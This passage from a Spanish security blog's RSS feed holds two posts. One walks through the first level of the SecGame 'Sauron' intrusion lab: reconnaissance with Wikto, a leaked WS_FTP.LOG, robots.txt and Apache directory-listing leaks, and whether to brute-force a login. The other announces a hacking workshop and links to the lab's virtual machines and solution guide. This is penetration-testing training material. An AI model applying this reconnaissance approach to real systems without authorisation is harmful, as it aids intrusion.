<strong>2. </strong>http://intranet.blindware.inc ( En adelante intranet )<br />
<strong>3. </strong>https://www.blindware.inc y https://intranet.blindware.inc ( En adelante https )<br />
<strong>2. </strong>El contenido de https que podemos revisar con Wikto no parece contener nada.<br />
<strong>3. </strong>Intranet nos pide autenticación para acceder.<br />
<strong>4. </strong>En www conocemos que:<br />
<strong>1. </strong>Tanto por la información pública existente, como por Wikto, existen sendos directorios de nombre data/ y data/stats/<br />
<strong>2. </strong>Wikto nos revela la existencia del fichero WS_FTP.LOG</p>
<p><strong>Antes de continuar debemos revisar el fichero WS_FTP.LOG:</strong></p>
<p>2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/index.php<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd0.log<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd1.log<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd2.log<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd3.log</p>
<p><strong>Con lo cual, parece que tenemos 2 opciones:</strong></p>
<p>1. Atacar la autenticación de intranet<br />
2. Intentar acceder en WWW a data/stats/ ( y a lo que parecen ser logs )</p>
<p>Aquí hay que decidir, en este caso, sobre intranet no sabemos absolutamente nada, mientras que sobre data/stats/ al menos sabemos que el día 8 de Mayo de 2007, contenía algún tipo de fichero de logs.</p>
<p>Evidentemente cada uno puede buscar lo que prefiera, y dónde prefiera, pero en este caso, los LOGS pueden resultar una información de vital interés pues pueden desvelarnos partes ocultas del aplicativo, y otras áreas de las que no tenemos conocimiento, así como usuarios con los que se accede a ellas ( si el acceso se hace autenticado mediante apache ) y otros muchos detalles.</p>
<p>Por el contrario, atacar directamente una autenticación de Apache, salvo que esté incorrectamente configurada, es algo bastante poco probable de llevar a buen fin, porque a priori, únicamente podremos atacar por fuerza bruta.</p>
<p>Con esto podemos concluir el primer nivel, habiendo visto las siguientes vulnerabilidades relativas a la “publicación de información sensible”:</p>
<ul style="text-align: justify;">
<li>En los comentarios del fichero “load.js” se filtra información</li>
<li>El fichero robots.txt mal facilita información relativa a áreas del aplicativo no públicas</li>
<li>Existen el WS_FTP.LOG conteniendo información sensible</li>
<li>El servidor Apache, está incorrectamente configurado, permite, mediante la opción INDEXES, la navegación por aquellos directorios que no contienen un fichero índice.</li>
</ul>
<p style="text-align: justify;">Así mismo tenemos un objetivo para iniciar nuestro ataque: el directorio data/stats/ terminando así el primer nivel de Sauron. Este primer nivel es igual para ambos niveles de complejidad.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii/feed</wfw:commentRss>
		</item>
		<item>
		<title>Solución y seguimiento del HackTaller 01 DragonJAR (I de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:31:53 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[DragoNLab-HackTaller]]></category>

		<category><![CDATA[Auditoría]]></category>

		<category><![CDATA[Comunidad DragonJAR]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=76</guid>
		<description><![CDATA[<img src="http://img527.imageshack.us/img527/5823/icolabsrj4.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Gracias a todas las personas que asistieron a este primer HackTaller de la Comunidad DragonJAR.</p>
<p style="text-align: justify;">Ya muchos de los participantes están dejando sus comentarios y anécdotas del encuentro en el foro de la Comunidad (<a href="http://foro.dragonjar.us/hacktaller_01_en_medellin-t27830.0.html" target="_blank">Foro HackTaller</a>)</p>
<p style="text-align: justify;">Aquí tenemos la primera galería de imágenes del HackTaller (<a href="http://www.flickr.com/photos/23466734@N07/show/" target="_blank">ver galería</a>)</p>
<p style="text-align: justify;">Desde hoy empezaré a publicar los recursos utilizados para llevar a cabo este primer HackTaller de la Comunidad DragonJAR.</p>
<p style="text-align: justify;">El ambiente virtualizado de intrusión utilizado para este HackTaller es el recurso que había publicado en la Web principal de la Comunidad (<a href="http://www.dragonjar.org/secgame-1-sauron.xhtml" target="_blank">SecGame: Sauron</a>)</p>
<p style="text-align: justify;">Desde hoy publicaré cada nivel de solución en formato de video (sin sonido).<br />
Para quienes quieran ir a un ritmo más rápido pueden hacer uso del documento en pdf del solucionario publicado por la gente de <a href="http://www.sg6.es/labs/" target="_blank">SG6 Labs</a>.<br />
A <a href="http://www.sg6.es/labs/" target="_blank">SG6</a> Labs muchas gracias por la publicación de este magnífico recurso.</p>
<p style="text-align: justify;"><span id="more-76"></span>SecGame es un proyecto diseñado por <a href="http://www.sg6.es/labs/" target="_blank">SG6 Labs</a> para el desarrollo de entornos que permitan la simulación de test de intrusión adaptados a escenarios reales.<br />
Estos entornos permiten no sólo la adquisición de habilidades, sino también la evaluación de las mismas, tanto dentro de los estrictamente conocimientos prácticos, como de las metodologías aplicadas al escenario.<br />
Dentro de los entornos a desarrollar se recogerán las principales necesidades del campo de la auditoría técnica de seguridad informática: revisión de aplicativo web, revisión de servicios, revisión de código, revisión de sistemas de gestión de bases de datos, revisión de configuraciones y políticas de seguridad, entre otras, intentando en cada entorno que dentro de su completitud, focalice las problemáticas más típicas de cada uno de los escenarios.</p>
<p style="text-align: justify;"><strong>Objetivos</strong></p>
<ul style="text-align: justify;">
<li>Proporcionar un entorno de simulación para la auditoria técnica de sistemas de información que permita el aprendizaje y la mejora de habilidades.</li>
<li>Desarrollar un entorno de simulación basado en casos y escenarios reales de sistemas, sin que exista separación física de niveles, permitiendo un mayor realismo en la explotación de los entornos.</li>
<li>Dotar de una relación extensa de escenarios bajo unos sistemas heterogéneos que permitan la revisión de un conjunto amplio de casos interrelacionados entre sí.</li>
<li>Permitir la revisión de aplicativo web desarrollado en múltiples lenguajes, mostrando diversos errores en la codificación del mismo.</li>
<li>Permitir la revisión de configuraciones de servicios, mostrando diferentes niveles de securizacion, y su impacto sobre los sistemas.</li>
<li>Permitir la revisión de servicios inseguros, mostrando errores comunes y fallos de seguridad en los mismos.</li>
<li>Permitir la revisión de código fuente inseguro, mostrando errores comunes y fallos de seguridad en el mismo.</li>
<li>Permitir la revisión de sistemas de gestión de bases de datos, mostrando errores típicos en el acceso a los mismos, y errores de gestión y configuración.</li>
<li>Innovar en el área de los aplicativos destinados a la preparación de test de intrusión haciendo uso de la vitalización y las posibilidades de red que ofrecen estos entornos.</li>
</ul>
<p style="text-align: justify;"><a href="http://www.4shared.com/get/50684587/20276eda/H_ack_Taller_DragonJAR_SECGAME_01.html" target="_blank"><strong>Video tutorial de instalación del ambiente virtualizado de intrusión en Windows</strong></a> (Password: www.dragonjar.org).<br />
Recursos necesarios:</p>
<ul style="text-align: justify;">
<li><span style="font-weight: bold;">SecGame #1 Sauron: Máquinas virtuales (cualquiera de las dos versiones)</span>
<ul>
<li><a href="http://www.secgame.org/downloads/sauron.rar" target="_blank">Descargar máquina virtual Sauron</a> (530MB. Dificultad Normal)</li>
<li><a href="http://www.secgame.org/downloads/sauron-hard.rar" target="_blank">Descargar máquina virtual Sauron</a> (519MB. Dificultad Alta)</li>
</ul>
</li>
<li><span style="font-weight: bold;">Binarios para Windows</span>
<ul>
<li><a href="http://www.secgame.org/downloads/setupqemuk40.exe" target="_blank">Qemu Manager 4.0</a></li>
<li><a href="http://www.secgame.org/downloads/openvpn-2.0.9-install.exe" target="_blank">OpenVPN 2.0.9</a></li>
</ul>
</li>
</ul>
<p style="text-align: justify;"><strong><a href="http://www.4shared.com/file/50714852/2b77c69f/SecGame.html" target="_blank">Solucionario en formato pdf</a> </strong>(password: www.dragonjar.org)<br />
<strong><a href="http://www.4shared.com/file/19342817/58b92e87/Gua_de_Pruebas_OWASP_v20.html" target="_blank">Documentación de interés</a></strong> - Guía de pruebas OWASP (password: www.dragonjar.org)<br />
<a href="http://es.wikipedia.org/wiki/Virtualizaci%C3%B3n" target="_blank"><strong>Virtualización</strong></a><br />
<strong><a href="http://es.wikipedia.org/wiki/QEMU" target="_blank">Qemu</a></strong><br />
<a href="http://es.wikipedia.org/wiki/Red_privada_virtual" target="_blank"><strong>VPN</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii/feed</wfw:commentRss>
		</item>
	</channel>
</rss>
